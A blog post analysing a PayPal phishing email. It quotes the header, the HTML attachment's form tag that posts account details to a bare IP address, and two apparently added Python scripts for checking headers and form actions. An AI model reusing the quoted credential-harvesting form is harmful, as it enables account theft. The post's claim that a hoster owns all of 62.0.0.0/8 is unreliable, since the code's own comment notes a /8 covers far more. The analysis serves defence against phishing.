Anatomy of a scam attack

Today I received yet another one of those scam mails which informed me about an issue with my PayPal account and asked me to re-enter my account details.

You all know these funny mails. It is still remarkable that people keep falling into this trap. Anyway, I trust you do what I usually do: just delete such mails.

However, this time I spent a little time analyzing the scam:

1.) Mail header

Looking at the source of the mail, I found this:

Received: from unknown (HELO mx.elko.ro) (89.38.207.22)

This means the mail was sent from a server called elko.ro. By visiting the elko.ro website, I found that this is a regular computer company. Most likely their mail server is insecure and allows open relaying, so the scammers misused it to submit this mail. But that’s neither surprising nor really helpful. Maybe somebody should inform elko.ro about this issue on their server.
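To make this header check repeatable, here is an added example (my own code, not part of the original post) that parses the Received chain of a raw message and returns the earliest hop with a globally routable address. The sample message is constructed: the qmail-style line is the one quoted above, the other hop uses RFC 5737 documentation addresses. Note that only the connecting IP is trustworthy; the HELO name (mx.elko.ro here) and anything in a Received line added before your own server's are supplied by the sender and can be forged.

```python
import email
import ipaddress
import re

# Constructed sample message. The second Received line is the one quoted in the post;
# the first is an invented local hop using RFC 5737 documentation addresses.
RAW_MAIL = """\
Received: from mx.example.net (mx.example.net [192.0.2.10])
\tby mail.example.net with ESMTP; Mon, 1 Jan 2014 10:00:00 +0000
Received: from unknown (HELO mx.elko.ro) (89.38.207.22)
\tby mx.example.net with SMTP; Mon, 1 Jan 2014 09:59:58 +0000
From: "PayPal" <service@example.com>
Subject: Your account has been limited
Content-Type: text/plain

Please re-enter your account details.
"""

# qmail style: "from <rdns> (HELO <helo>) (<ip>)"
QMAIL_RE = re.compile(
    r"from\s+(?P<rdns>\S+)\s+\(HELO\s+(?P<helo>[^)]+)\)\s+\((?P<ip>[0-9A-Fa-f.:]+)\)"
)
# Postfix / Sendmail style: "from <helo> (<rdns> [<ip>])" or "from <helo> ([<ip>])"
POSTFIX_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9A-Fa-f.:]+)\]\)"
)


def parse_received(value):
    """Extract HELO name, reverse-DNS name and connecting IP from one Received header.

    Returns None for lines without a 'from <host> (...)' clause, e.g. local handoffs."""
    text = re.sub(r"\s+", " ", value).strip()  # unfold continuation lines
    m = QMAIL_RE.search(text) or POSTFIX_RE.search(text)
    if not m:
        return None
    rdns = m.group("rdns")
    return {
        "helo": m.group("helo"),
        "rdns": None if rdns in (None, "unknown") else rdns,
        "ip": m.group("ip"),
    }


def received_hops(raw):
    """Return parsed hops in delivery order (earliest hop first).

    Every MTA prepends its own Received line, so the header order is newest-first."""
    msg = email.message_from_string(raw)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    return [h for h in reversed(hops) if h]


def originating_hop(raw):
    """Earliest hop whose connecting address is globally routable.

    Only the IP can be relied on: the HELO name is chosen by the connecting client."""
    for hop in received_hops(raw):
        try:
            if ipaddress.ip_address(hop["ip"]).is_global:
                return hop
        except ValueError:
            continue
    return None


if __name__ == "__main__":
    hop = originating_hop(RAW_MAIL)
    print(f"submitted from {hop['ip']} (HELO {hop['helo']}, rDNS {hop['rdns']})")
```

The rDNS field comes back as None when the receiving server logged "unknown", which is exactly what the quoted line shows: the connecting address had no reverse DNS entry at all, another hint that it is not a well-run mail server.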

2.) Mail attachment

Like most scam mails of this type, this one also contained an attachment: in this case just an HTML file containing the form I was supposed to fill out in order to get my account re-activated.

Browsing through this script, I found that they use some images and links directly from PayPal and some others from postimg.org, a service for uploading images. Maybe somebody wants to contact postimg.org and ask who uploaded the image 3wpnm7loj/STRADA.png, for instance.

Anyway, the interesting part is where the form is sent once it has been filled out, and here it is:

<form class='safeSubmit multiplesubmitform' method='post' id='signup_form' name='signup_form' action='http://62.76.190.93/index.php' onSubmit='return sTest();'>

The form is sent to 62.76.190.93. Entering this IP address into the Domain tool of NetworkToolbox reveals that this is a server in Russia, hosted by clodo.ru, which is known as a very liberal web hoster.

3.) and so…

Nothing, really. This was a really simple one. Even the script was badly coded, and the text contains some dreadful spelling mistakes, which makes it quite easy to identify this mail as a scam. It should even be easy to identify those guys now, but I doubt that anybody in Russia will care.

However, even though it would only help against this specific type of scam, I would recommend (again) blocking direct IP access in your firewall/router (the parental controls offered by some routers do a great job here), and you may want to block the address ranges of clodo.ru, which is 62.0.0.0/8 (62.0.0.0 – 62.255.255.255), because most likely you won’t visit a website hosted at clodo.ru. Blocking direct IP access redirects you to an error page of the firewall/router whenever a link is opened that only contains an IP address rather than a fully qualified domain name. Yes, of course, those guys could have registered a domain name in addition, but then they would have left another trace, and just recently ICANN started an initiative which makes it harder to register a domain anonymously.
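The two checks from sections 2 and 3, finding out where an attached form posts to and deciding whether that destination is a bare IP address or falls into a blocked range, can be done without opening the attachment in a browser. The following is an added example of my own, not code from the post: it parses an HTML attachment with Python's standard library, lists every form action and every third-party host the page loads resources from, and flags actions that post to an IP literal, to an address inside a configured CIDR list, or to a host outside the brand's own domains. The sample HTML is constructed around the form tag quoted above; the action address and the postimg.org path are from the post, the PayPal image and link URLs are invented. The post's 62.0.0.0/8 is used as the configured range, but verify any range with whois before blocking it: a /8 is over 16 million addresses and covers far more than a single hoster.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML attachment modelled on the form tag quoted in the post. The form
# action and the postimg.org image path are taken from the post; the paypal.com URLs
# are invented placeholders.
ATTACHMENT = """\
<html><body>
<img src="https://www.paypal.com/images/logo.gif">
<img src="http://s1.postimg.org/3wpnm7loj/STRADA.png">
<form class='safeSubmit multiplesubmitform' method='post' id='signup_form'
      name='signup_form' action='http://62.76.190.93/index.php' onSubmit='return sTest();'>
  <input name='email'><input name='password' type='password'>
</form>
<a href="https://www.paypal.com/help">Help</a>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect form actions and the URLs of embedded images and links."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.resources = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "img" and a.get("src"):
            self.resources.append(a["src"])
        elif tag == "a" and a.get("href"):
            self.resources.append(a["href"])


def host_of(url):
    """Lower-cased host part of a URL, or '' for relative URLs."""
    return (urlsplit(url).hostname or "").lower()


def is_bare_ip(host):
    """True if the host is an IP literal rather than a domain name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def in_blocked_ranges(host, ranges):
    """True if host is an IP literal inside one of the configured CIDR ranges."""
    if not is_bare_ip(host):
        return False
    ip = ipaddress.ip_address(host)
    return any(ip in ipaddress.ip_network(r) for r in ranges)


def belongs_to(host, domains):
    """True if host is one of the given domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def analyze(html_text, brand_domains, blocked_ranges=()):
    """Report where each form posts and which third-party hosts the page references."""
    p = LinkCollector()
    p.feed(html_text)
    forms = []
    for action in p.form_actions:
        host = host_of(action)
        reasons = []
        if is_bare_ip(host):
            reasons.append("posts to a bare IP address")
        if in_blocked_ranges(host, blocked_ranges):
            reasons.append("address is inside a blocked range")
        if host and not belongs_to(host, brand_domains):
            reasons.append("host is outside the brand's domains")
        forms.append({"action": action, "host": host, "reasons": reasons})
    third_party = sorted({host_of(u) for u in p.resources
                          if host_of(u) and not belongs_to(host_of(u), brand_domains)})
    return {"forms": forms, "third_party_hosts": third_party}


if __name__ == "__main__":
    report = analyze(ATTACHMENT, ["paypal.com"], ["62.0.0.0/8"])
    for f in report["forms"]:
        print(f["action"], "->", "; ".join(f["reasons"]) or "looks legitimate")
    print("third-party hosts:", ", ".join(report["third_party_hosts"]))
```

The same `is_bare_ip` and `in_blocked_ranges` logic is what a router's "block direct IP access" rule and a CIDR block list implement at the network level; running it over the attachment first shows you what such a rule would have caught before any credentials are typed in.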

So… Don’t trust the evil!

Regards,

Marcus